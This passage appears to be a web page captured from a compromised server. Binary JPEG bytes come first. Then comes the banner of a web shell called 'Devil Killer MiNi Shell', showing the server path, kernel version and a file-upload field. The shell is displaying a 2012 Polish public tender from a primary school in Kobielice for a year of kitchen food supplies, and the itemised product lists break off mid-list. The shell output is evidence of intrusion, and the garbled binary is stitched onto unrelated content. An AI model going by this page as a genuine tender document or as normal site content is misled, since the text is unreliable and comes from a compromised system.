JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/483612-N-2012.html

<p class="kh_header"><b>Radostowice: Zakup środków żywieniowych wraz z dostawą na potrzeby kuchni szkolnej 
w Szkole Podstawowej im. Adama Mickiewicza w Kobielicach na 2013 rok.</b><br>
<b>Numer ogłoszenia: 483612 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach , ul. Topolowa 61, 43-262 Radostowice, woj. śląskie, tel. 32 212 52 26, faks 32 212 52 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spkobielice.edupage.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup środków żywieniowych wraz z dostawą na potrzeby kuchni szkolnej 
w Szkole Podstawowej im. Adama Mickiewicza w Kobielicach na 2013 rok..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup środków żywieniowych wraz z dostawą  na potrzeby kuchni szkolnej w Szkole Podstawowej im. Adama Mickiewicza w Kobielicach  na 2013 rok , tj.  od 02.01.2013r. do 31.12.2013r.

Szczegółowy wykaz artykułów żywnościowych z podziałem na poszczególne części, wraz z ich rocznym zapotrzebowaniem zawarto w załącznikach do SIWZ. Ustala się  7 części podlegających zamówieniu. Wykonawca może złożyć ofertę na całość zamówienia, poszczególną część lub na wybrane części:

1.   Część I - Pieczywo, świeże wyroby piekarskie i ciastkarskie
2.   Część II - Mięso, wędliny, konserwy i wyroby mięsne
3.   Część III - Drób
4.   Część IV - Ryby, przetworzone i konserwowe
5.   Część V - Warzywa, owoce i przetwory
6.   Część VI - Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie i jaja
7.   Część VII - Produkty sypkie i różne produkty spożywcze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku wiedzy i doświadczenia, Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie powinien wykonać (w przypadku świadczeń okresowych lub ciągłych mogą to być również dostawy wykonywane) co najmniej jednej dostawy o wartości powyżej 10 000,00 zł. z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie - Załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)	Wykonawca będzie realizował dostawy własnym transportem i na własne ryzyko. Każdy samochód, którym będzie dostarczana żywność musi posiadać aktualną decyzję Państwowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów ( art. spożywcze, warzywa, owoce, jaja, mięso i wędliny, itp.). Zamawiający zastrzega sobie prawo do zażądania stosownego dokumentu w momencie dostawy produktów. Żywność będzie dostarczana w pojemnikach Wykonawcy, za które nie będzie pobierał opłat. Zamawiający będzie zobowiązany do zwrotu pojemników Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych - Załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - Prawo zamówień publicznych - Załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spkobielice.edupage.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach
43-262 Radostowice, ul. Topolowa 61.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 09:00, miejsce: Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach
43-262 Radostowice, ul. Topolowa 61.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie i ciastkarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Babeczki kruche z owocami 180g.	szt.	30
2	Babka drożdżowa z rodzynkami 450g	szt.	18
3	Babka piaskowa 550g	szt.	20
4	Bułka grahamka 80g	szt.	350
5	Bułka kajzerka 50g	szt.	1500
6	Bułka kanapkowa krojona (wek 300g)	szt.	320
7	Bułka kukurydziana 70g	szt.	300
8	Bułka maślana 80g	szt.	500
9	Bułka pikantno-serowa 65g	szt.	180
10	Bułka serowa 70g	szt.	190
11	Bułka staropolska 100g	Szt.	2800
12	Bułka tarta 0,5kg	kg	180
13	Bułka zwykła 90g	szt.	4600
14	Bułka żytnia 70g	szt.	100
15	Chleb 1000g krojony	szt.	700
16	Chleb krojony ze słonecznikiem 500 g	szt.	10
17	Drożdżówka (różne smaki) 160 g	szt.	250
18	Drożdżówka Mini (różne) 100g	szt.	290
19	Drożdżówka podwójna 140g	szt.	40
20	 Francuskie (różne) 150 g	szt.	40
21	Jagodzianka 130g	szt.	150
22	Keks 450g szt.	16
23	Kołocz z jabłkami	kg	4
24	Kołocz z posypką	kg 4
25	Makowiec kg	5
26	Pączki (różne)100g	szt.	80
27	Pączki serowe małe	kg	6
28	Półfrancuskie 140 g	szt.	100
29	Rogal z nadzieniem (różne)150g	szt.	140
30	Rogalik zwykły 100g	szt.	570
31	Chleb wieloziarnisty, krojony, 500g.	szt.	10
32	Bułka jogurtowa 80g	szt.	30
33	Muffinka różne smaki 70g	szt.	50
34	Francuskie z marcepanem 150g	szt.	40
35	Babka jogurtowa 500g	szt.	20
36	Chleb z błonnikiem krojony 600g	szt.	4
37	Chleb żytni z koperkiem krojony 400g 	szt.	4
38	Chleb witalny krojony 500g 	szt.	4
39	Chleb orkiszowy krojony	kg	4
40	Bułka serce 100g	szt.	25
41	Chleb kukurydziany 450g  krojony	szt.	2
42	Chleb dietetyczny krojony 350g 	szt.	2
43	Babka cytrynowa 450g	szt.	6
44	Babka firmowa 450g	szt.	6
45	Ciasto zebra	kg	4
46	Szarlotka na kruchym	kg	4
47	Groszek ptysiowy	kg	2
48	Biszkopty	kg	2
49	Herbatniki kruche różne rodzaje	kg	6
50	Pączki mini	kg	3
51	Crossanty z nadzieniem owocowym 150g	szt.	50
52	Crosanty z nadzieniem marcepanowym 150g	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięso, wędliny, konserwy i wyroby mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Boczek wędzony	kg	46
2	Frankfuterki	 kg	40
3	Kiełbasa domowa	kg	190
4	Kiełbasa drobiowa krojona	kg	15
5	Kiełbasa kasztelańska krojona	kg	10
6	Kiełbasa krakowska krojona	kg	5
7	Kiełbasa orawska	kg	7
8	Kiełbasa szynkowa krojona	kg	10
9	Kiełbasa zwyczajna	kg	300
10	Kiełbaska win erka	kg	50
11	Kiełbaska z indyka	 kg	20
12	Kiełbaski Śląskie	kg	10
13	Kita wieprzowa	kg	50
14	Kości wędzone	kg	120
15	Łopatka wieprzowa b k	kg	750
16	Mielonka	kg	90
17	Mięso garmażeryjne	kg	400
18	Mortadela	kg	50
19	Pasztet borowikowy	kg	2
20	Pasztet drobiowy 160g, wartość energ. w 100 g produktu: 220 kcal, białko 7,5g, węglowodany 5,5g, tłuszcze 16,3g	p	60
21	Pasztet wieprzowy	kg	7
22	Pieczeń  Tyrolska krojona kg	5
23	Polędwica wędz. gotowana krojona	kg	5
24	Schab z kością	kg	390
25	Szynka drobiowa krojona	kg	10
26	Szynka koperkowa krojona	kg	10
27	Szynka konserwowa krojona	kg	8
28	Szynka mielona krojona	kg	10
29	Szynka pieczona krojona	kg	10
30	Szynka prasowana wieprzowa krojona	kg	15
31	Szynka wiejska krojona	kg	8
32	Szynka wieprzowa krojona	kg	8
33	Wołowe b k	kg	220
34	Żeberka wędzone	kg	10
35	Żeberka wieprzowe	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z kurczaka	kg	660
2	Kurczak 	kg	70
3	Porcje rosołowe	kg	200
4	Podudzie z kurczaka (pałka)	kg	110
5	Udziec z kurczaka	kg	90
6	Udziec z indyka	kg	50
7	Mięso gulaszowe z indyka kg	220.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ryby, przetworzone i konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z makreli w pomidorach 170g	puszki	80
2	Filet z soli	kg	290
3	Paluszki lub kostka rybna panierowana- mrożone 	kg	180
4	Tuńczyk w sosie własnym 170g	puszki	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa, owoce i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Banan	kg	600
2	Brokuł mrożony 450g	szt.	60
3	Brokuł świeży	szt.	20
4	Brzoskwinie kondensowane 450 g	puszka	6
5	Brzoskwinie świeże	szt.	35
6	Buraki	 kg	250
7	Cebula	kg	360
8	Czosnek	szt.	160
9	Dżem 280g , bez konserwantów, zawartość cukru w 100g produktu-38g	szt.	190
10	Fasola Jaś	kg	50
11	Fasola szparagowa 450g	szt.	15
12	Groch łuskany	kg	75
13	Groszek - mrożonka, 450g.	szt.	10
14	Groszek konserwowy 1 l	l	30
15	Jabłka	kg	600
16	Kalafior mrożony 450g	szt.	200
17	Kalafior świeży	szt.	80
18	Kalarepa	szt.	10
19	Kapusta biała	kg	600
20	Kapusta biała nowa	szt.	150
21	Kapusta czerwona	kg	300
22	Kapusta czerwona nowa	szt.	30
23	Kapusta kiszona	kg	350
24	Kapusta pekińska	szt.	50
25	Kapusta pekińska	kg	30
26	Koncentrat pomidorowy 1l	szt.	120
27	Kukurydza konserwowa 400g, 74 kcal w 100g	szt.	10
28	Mandarynka	 kg	200
28	Marchew	kg	520
30	Marchewka z groszkiem - mrożonka, 450g.	szt.	20
31	Mrożonka zupa 450g	szt.	120
32	Nektarynka	szt.	300
33	Ogórek kiszony	kg	90
34	Ogórek konserwowy 1l.	l	190
35	Ogórek zielony	kg	160
36	Papryka konserwowa 1 l	szt.	30
37	Papryka świeża	kg	20
38	Pieczarka	kg	80
39	Pietruszka	kg	30
40	Pomarańcza	 kg	90
41	Pomidor	kg	60
42	Por	szt.	300
43	Rzodkiewka	pęczek	10
44	Sałata	szt.	6
45	Seler	kg	10
46	Sok wieloowocowy 200ml kartonik ,bez zawartości cukru	szt.	6000
47	Sok owocowy 300ml, plastikowe opakowanie, produkowany w technologii:Top Aseptic	szt.	4000
48	Syrop owocowy 380 ml	szt.	6
49	Szczypiorek	pęczek	8
50	Szpinak mrożony 450g	szt.	70
51	Truskawka mrożona 450g	szt.	25
52	Ziemniaki	kg	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie i jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Olej uniwersalny 1l	szt.	480
2	Margaryna mleczna do pieczenia i duszenia, opakowanie 250g, zawartość tłuszczu 70%	szt.	800
3	Kefir 400ml	szt.	170
4	Jogurt owocowy- 125g, wartość energ. w 100g produktu- 95 kcal	szt.	300
5	Serek homogenizowany 150g, wartość energ. w 100g produktu-
144 kcal	szt.	300
6	Masło 200g,  zawartość tłuszczu min. 82%	szt.	1700
7	Mleko 3,2% 1l, wartość energ. w 100ml- 60 kcal	szt.	600
8	Ser biały krajanka	kg	280
9	Serek topiony 100g (zwykły
lub smakowy)	szt.	150
10	Ser żółty krojony	kg	60
11	Śmietana 12% ,500g , wartość energ. w 100ml -134 kcal,	szt.	250
12	Śmietana zakwaszana 400ml 18%	szt.	190
13	Śmietana 30% 400ml	szt.	10
14	Jaja	szt.	5700
15	Jogurt owocowy 125g, wartość energ. w 100g-79 kcal, zawartość białka-1,8g w 100g produktu	szt.	300
16	Jogurt 115g , wartość energ. 122 kcal w 100g produktu, 2,6 g, białka w 100g produktu	szt.	300
17	Deser czekoladowy 175g, wartość energ. w 100g produktu-101 kcal, zawartość białka w 100g produktu-2,4g	szt.	300
18	Jogurt kremowy z dodatkiem owocowego musu 110g	szt.	300
19	Napój mleczny owocowy 180g	szt.	300
20	Deser z bitą śmietaną 100g, wartość energ. w 100g produktu-99 kcal, zawartość tłuszczu w 100g produktu-3 g	szt.	300
21	Deser- ryż na mleku z owocami,
180 g	szt.	300
22	Deser czekoladowy lub waniliowy z bitą śmietaną,
175g, wartość energ.- 101 kcal w 100g produktu	szt.	300
23	Deser mleczny z czekoladą, 150g , wartość energ. w 100g produktu-195 kcal, zawartość tłuszczu w 100g produktu-13,3g	szt.	300
24	Jogurt owocowy do picia 330g, wartość energ..75 kcal w 100ml produktu, zawartość tłuszczu w 100ml produktu-1 g	szt.	300
25	Jogurt owocowy, 125g , wartość energ. w 100g produktu-91 kcal, zawartość tłuszczu w 100g produktu-1,1g	szt.	300
26	Jogurt owocowy 80g, wartość energ. w 100g produktu-107 kcal, zawartość białka w 100g produktu-6,3g	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Produkty sypkie i różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wafel czekoladowy, 40 g, wartość energ. 210 kcal - wafel	szt.	200
2	Baton mleczny, wartość energ. w 100g produktu- 448 kcal	szt.	200
3	Herbatnikowe ciasteczka, o długości 110mm, zawartość karmelu 32%, zawartość czekolady 35%- 2 szt. w opak.	op.	200
4	Biszkopty podłużne 140g	szt.	40
5	Biszkopty okrągłe opakowanie 120g	szt.	40
6	Budyń z cukrem, wartość energ. po przyrządzeniu 85 kcal w 100g produktu, zawartość cukru w 100g- 8,7g	szt.	130
7	Cukier	kg	1900
8	Cukier waniliowy 10 g	szt.	190
9	Cynamon sypki 15 g	szt.	90
10	Cytrynka 1l.	szt.	450
11	Drożdże 100g	szt.	12
12	Galaretka 100g, wartość energ. po przyrządzeniu-49 kcal w 100g, zawartość cukru w 100g- 10,6g	szt.	130
13	Gałka muszkatowa 10g	szt.	20
14	Groszek ptysiowy200g	szt.	20
15	Herbata 100g	szt.	900
16	Herbatniki mały 50g	szt.	300
17	Przyprawa uniwersalna do potraw 200g, zawartość warzyw suszonych 15,2% ,	szt.	440
18	Kakao ciemne, bez cukru, 200g, o zawartości tłuszczu 10-12%	szt.	20
19	Kasza gryczana 1kg	kg	60
20	Kasza jęczmienna1kg	kg	30
21	Kasza manna 1kg	kg	16
22	Kawa rozpuszczalna zbożowa -zboża 72%, 150 g, wartość energ. w 100g produktu: 346 kcal, białko- 4,9 g, węglowodany- 81,4 g, tłuszcze-0,1 g  w 100 g produktu	szt.	10
23	Ketchup , 500 g, wartość energ. w 100g produktu- 94 kcal, zawartość koncentratu pomidor- 37%	szt.	40
24	Mleczna kanapka, wartość energ. 420 kcal w 100g produktu, zawartość mleka pasteryzowanego- 40%	szt.	200
25	Kruche ciastka maślane 125g	szt.	15
26	Liść laurowy 6 g	szt.	40
27	Majeranek 10 g	szt.	26
28	Majonez dekoracyjny, wartość energ. 739 kcal w 100g produktu, zawartość tłuszczu w 100g produktu- 80 g	l	80
29	Makaron domowy,250g zawartość jaj- 23,8%	szt.	46
30	Makaron łazanki, 500g, wartość energ. w 100g produktu- 375 kcal, zawartość tłuszczu- 1,7g w 100g produktu	kg	50
